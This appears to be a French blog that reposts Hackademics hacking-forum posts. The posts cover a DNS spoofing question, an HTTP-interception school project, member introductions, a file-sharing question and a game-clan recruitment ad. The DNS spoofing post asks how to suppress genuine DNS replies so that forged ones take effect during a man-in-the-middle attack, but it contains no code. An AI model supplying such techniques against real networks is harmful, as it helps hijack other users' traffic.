Bonjour à tous :)

Je m'interesse actuellement au DNS spoofing et pour ça j'utilie dnsspoof. Je soucis que je recontre se passe au niveau de la réponse DNS. J'ai vérifier avec wireshark et il voilà comment ça se passe sur la machine cible:
- demande de résolution DNS
- réception de la réponse DNS (authentique)
- réception de la réponse DNS (falsifié)

Seul la première réponse est prise en compte. Pour le moment la seule solution que j'ai trouvé consiste à mettre en place un proxy pendant le MITM mais c'est asse lourd.
D'où ma question: quelqu'un connaitrait il un moyen de bloquer les réponses (ou même les demandes) DNS? J'écoute aussi toutes les solutions possible ;)

Merci d'avance :)


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1X7g92n
via IFTTT

Tutoriel Comment intercepter un requete web dans un réseau et l'interpréter

Bonjour,
j'ai un projet scolaire à réaliser. le projet consiste à créer une application qui intercepte des requêtes HTTP d'un client vers un serveur et l'interprete. Je demande votre aide pour savoir quel dispositif technique utilisé et vers quel cours me tourner.
Merci


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1La69Vd
via IFTTT

Présentation

Bonjour à tous,

Pseudo:
Creon

Connaissances informatiques générales :
Gestion basique d'Ubuntu via la console (installation de paquets, modifications de dossiers, etc)
Commandes basiques sous windows.
Programmation de sites web (php,js,SQL).
Commence à apprendre python (scripts pour serveur web)
Connaissance de plusieurs protocoles de communication (TCP/IP, Modbus, liaison série RS485/RS232 et SNMP)

Connaissances en hacking :
Faibles (bases en sécurité web).

Système d'exploitation principal :
Windows vista.
Ubuntu.

Je viens sur ce forum pour :
Mon but en venant ici n'est pas à proprement parlé de devenir hacker.
Je souhaite apprendre à mieux protéger mes codes et mes données.
Pour ce faire, je dois apprendre à identifier les failles et savoir les supprimer.

J'ai connu ce forum via :
Notre ami google

Informations supplémentaires (job, intérêts, autres...) :
Je suis automaticien de métier et par définition un peu bidouilleur professionnel en gros.
De ce point de vu, cela fait déjà de moi un hacker au sens primaire du terme (si j'ai bien compris :) )
Je suis un passionné par les sciences en général et la quasi totalité des domaines techniques.
J'espère apprendre beaucoup de vous et pourquoi pas par la suite en donner encore plus!


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1U6O2Ry
via IFTTT

dimanche 6 mars 2016

Server Web :: log :: URL Bizarre

Ce résumé n'est pas disponible. Veuillez cliquer ici pour afficher l'article.

Partage de fichier sécurisé

Bonjour la team,

je souhaiterais partager un fichier avec un utilisateur :
- soit en intégrant le lien dans un email. Ce lien ne pouvant être utilisé qu'une seule fois.
- soit en utilisant un logiciel (gratuit ou payant) permettant d'accéder à mon fichier en lecture seule et permettant uniquement de le visionner à distance, sans pouvoir télécharger le fichier.

Savez-vous si cela est possible ?

Berni.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Yj2gzi
via IFTTT

Présentation : Hades worm

Pseudo (+autres si plusieurs) :Hades worm,Had1x,H11.
Connaissances informatiques générales : Desinféction malware,boost pc , tests de différentes distributions Linux , programmation languagage interpreté .
Connaissances en hacking :Virologie,failles web , exploits, audit , test d'intrusion
Système d'exploitation principal :Xubuntu , Windows 7.
Je viens sur ce forum pour : aider les autres ,m'améliorer en Hacking
J'ai connu ce forum via :Google
Informations supplémentaires (job, intérêts, autres...)
J'aime pratiquer le Rugby , je suis encore étudiant donc je commets des erreurs


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1X4ikUe
via IFTTT

samedi 5 mars 2016

News [ WARFARM ]☆ 1337 Gamer'Z ☆ ✔ [Lvl.6] !! RECRUTE 100+

270216niak2.jpg
[MEDIA=youtube]s3xMbRRhbRs[/MEDIA]

Bonjour à tous
Notre clan 1337 recherche des membres. Nous sommes un Clan de WarFarm.


Le WarFarming c'est quoi ?

Le principe du WarFarm, c'est d'attaquer les deux premiers joueurs d'en face, qui auront sorties leurs HDV ainsi que leurs réservoirs, avec les héros, quelques archers, gobelins.
Et ainsi récupérer 30% (Plus 10% car clan level 4) et les réserves avec peu de troupes.
Notre clan fait partie d'une grande alliance de Clan WarFarm du monde entier. Plus d'informations en bas

854735Sanstitre.jpg
Le butin obtenu à la fin de la gdc: 324 000 OR / 324 000 Elixir / 1 566 Elixir Noir

Il faudra rajouter dans ce butin:
1ere attaque:91 000 OR et Elixir et 440 Elixir Noir
2ème attaque:89 000 Or et Elixir et 430 Elixir Noir
BUTIN TOTAL: 324 000 + 91 000 + 89 000 = 504 000 OR et Elixir
1 566 + 440 + 430 = 2 436 Elixir Noir
Il faudra rajouter 10% du total du butin ( Clan Niv.4 ) ce qui fera au total:
554 000 Or et Elixir et 2 679 elixir noir
Pour avoir attaqué soit en barcher ou seulement avec Héro !

Présentation du Clan 1:
Nom du clan: ™ 1337 Gamer'Z
Identifiant du clan: #PQR9RUV2
Site:www.1337gamerz.fr
Localisation : LESOTHO
Membres Actuel: 45
Crée le 01/05/2015
Pour entrer dans ce clan, il faut avoir un HDV 10, environ level 110+.
Ce clan n’accepte PAS les victoires !


Présentation du Clan 2:
Nom du clan: ™1337 Gamer'Z 2
Identifiant du clan: #P2PGUOQJ
Localisation: FRANCE
Site: www.1337gamerz.fr
Membres Actuel: 15
Crée le 21/02/2016
Pour entrer dans ce clan, il faut avoir un HDV 9 bien avancé, environ level 110+.
Ce clan ACCEPTE les victoires !
NOUS RECHERCHONS UN STAFF POUR LE CLAN 2


Nos concepts:

-Faire des GDC en continue contre des Clans WarFarm
-Des quizz, des loteries, des events*
-Des Cartes AppStore, GPlay de 15€

Nos règles:

Voici un petit extrait de nos règles les plus importantes.
Faire ses 2 attaques
Avoir L'application Line
Posséder un village WarFarm comme sur la photo
984494S3022884.jpg

Pourquoi avoir Line ?

Avoir Line nous permet une meilleur gestion du clan, de pouvoir montrer des images, d'avoir des salons pour les adjoints, un salon pour le clan 1 et bien d'autres choses.
Le règlement est disponible sur Line.
Il est obligatoire d'avoir Line pour recevoir le lot des concours.
Vous pouvez retrouver line sur ce site en cliquant ici.
Line est disponible sur PC, Android, iOS, WP, BB.

Pour d'éventuelles questions, vous pouvez contacter les chefs/adjoints sur Line:
1337niak
el3ven_
Shankslr

Serveur TeamSpeak 3 disponible pour tout le monde !
ts11.verygames.net:50158



25417194ts.jpg
Images jointes


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Ty4mwg
via IFTTT